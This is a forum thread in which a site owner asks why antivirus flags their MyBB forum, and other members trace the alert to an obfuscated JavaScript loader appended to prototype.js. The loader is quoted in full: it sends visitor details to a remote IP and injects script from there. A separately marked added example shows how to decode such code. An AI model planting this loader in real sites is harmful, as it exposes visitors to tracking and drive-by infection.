Posts: 4
Threads: 2
Joined: Sep 2011
Reputation:
1
When members try to access the forum, they get this error.
It's showing as a Java Drive-By.
Why is this so?
Forum link : http://goo.gl/GisPU
Thanks
Posts: 1,736
Threads: 198
Joined: May 2010
Reputation:
32
How about a direct link to your forum?
Posts: 4
Threads: 2
Joined: Sep 2011
Reputation:
1
(01-05-2012, 02:35 PM)Laugh Wrote: How about a direct link to your forum?
Here http://goo.gl/GisPU
Posts: 2,793
Threads: 251
Joined: Oct 2009
Reputation:
85
I can't tell if you're actually trying to infect members...
Posts: 5,793
Threads: 268
Joined: Sep 2010
Reputation:
85
01-05-2012, 06:01 PM
(This post was last modified: 01-05-2012, 06:15 PM by AceInfinity.)
(01-05-2012, 05:48 PM)Optimist Wrote: Here http://goo.gl/GisPU
That, again, is not a direct link. Now post the direct link to the forum if you need assistance, or it is valid to assume that you're up to no good.
OK, what I'm seeing that deviates from that standard script is this:
Code: var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;
Appended right at the end of the normal prototype.js for version 1.6.3 (1603)
Full script:
EDIT; FULL SCRIPT TOO LONG
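A block obfuscated like the one quoted above can be read without running it by decoding its hex-escaped string table and substituting the lookups back into the code. The following is an added example, not part of the original thread: the helper names `decodeHex` and `deobfuscate` are hypothetical, and the sample input is constructed in the same style with the placeholder host `example.invalid`.

```javascript
// Static deobfuscation only: the sample is treated as text and never evaluated.
// Constructed sample in the style of the appended block; the host is a placeholder.
const SAMPLE = String.raw`var _0xab12=["\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x65\x78\x61\x6D\x70\x6C\x65\x2E\x69\x6E\x76\x61\x6C\x69\x64\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"];var js=document[_0xab12[3]](_0xab12[2]);js[_0xab12[0]]=_0xab12[1]+escape(document.referrer);`;

// Decode \xNN escapes; any other escape sequence is left as written.
function decodeHex(literal) {
  return literal.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

function deobfuscate(source) {
  // Locate the string table: var _0x....=["...","..."];
  // Assumes no literal "]" inside the table, which holds for hex-escaped strings.
  const decl = /var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\]\s*;?/i.exec(source);
  if (!decl) return { code: source, strings: [], urls: [] };
  const [whole, name, body] = decl;

  const strings = [...body.matchAll(/"((?:[^"\\]|\\.)*)"/g)]
    .map((m) => decodeHex(m[1]));

  // Drop the table, then replace each _0x....[i] lookup with its decoded string.
  // Out-of-range indexes are left untouched so nothing is silently invented.
  let code = source.replace(whole, '');
  code = code.replace(new RegExp(name + '\\[(\\d+)\\]', 'g'),
    (match, i) => (+i < strings.length ? JSON.stringify(strings[+i]) : match));

  // obj["prop"] -> obj.prop when prop is a plain identifier.
  code = code.replace(/\[\s*"([A-Za-z_$][\w$]*)"\s*\]/g, '.$1');

  // Remote endpoints are what a reviewer wants to see first.
  const urls = strings.filter((s) => /^https?:\/\//i.test(s));
  return { code: code.trim(), strings, urls };
}

console.log(deobfuscate(SAMPLE).code);
console.log(deobfuscate(SAMPLE).urls);
```

The same function can be pointed at the tail of a modified `prototype.js` after diffing it against a stock copy of the same version, so only the appended part is analysed.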
Posts: 556
Threads: 36
Joined: Jun 2011
Reputation:
14
Direct Link: http://cybermafia.org/
He's not trying to infect other members. And I don't get the error. The reason you're getting it is because your antivirus or other security software is picking up your site as having malicious content. Probably because of the domain name.
Posts: 5,793
Threads: 268
Joined: Sep 2010
Reputation:
85
01-05-2012, 06:12 PM
(This post was last modified: 01-05-2012, 06:15 PM by AceInfinity.)
Probably not because of the domain name itself, cyber and mafia I don't see as malicious and I've visited other domain names and heard no problem about people with their AVs detecting "cyber" for sure. But his script has anomalies. It deviates from the standard prototype MyBB javascript. That's why I think it's being detected.
Not all AVs will detect the same things though, so either way this could also just be a false positive.
Edit: Sh*t, the script I originally had in code tags was cut off for being too long apparently, which in turn cut out the ending [ / code ] tag so it displays the full vertical length of it...
MY OWN forums' jscripts/prototype.js?ver=1603 (along with others I've looked at including SF's) does NOT have that extra bit I've posted. His is modified. That's why it's being detected.
View for yourself:
www.supportforums.net/jscripts/prototype.js?ver=1603
Posts: 2,793
Threads: 251
Joined: Oct 2009
Reputation:
85
(01-05-2012, 06:12 PM)AceInfinity Wrote: Edit: Sh*t, the script I originally had in code tags was cut off for being too long apparently, which in turn cut out the ending [ / code ] tag so it displays the full vertical length of it...
I too noticed this. I was just about to code it up for you.
Posts: 5,793
Threads: 268
Joined: Sep 2010
Reputation:
85
(01-05-2012, 06:14 PM)Sam Wrote: I too noticed this. I was just about to code it up for you.
You have extended post char limits as mod? Otherwise it's no big deal, I only wanted to show that his script is definitely modified.
Posts: 97
Threads: 2
Joined: Jan 2012
Reputation:
2
The script must be modified. It seems you're using Avast, which I use as well; on my old forum I never had a problem with it showing up as malicious content. I can try to fix this over TV if you like. My guess would be to install an original copy of the file.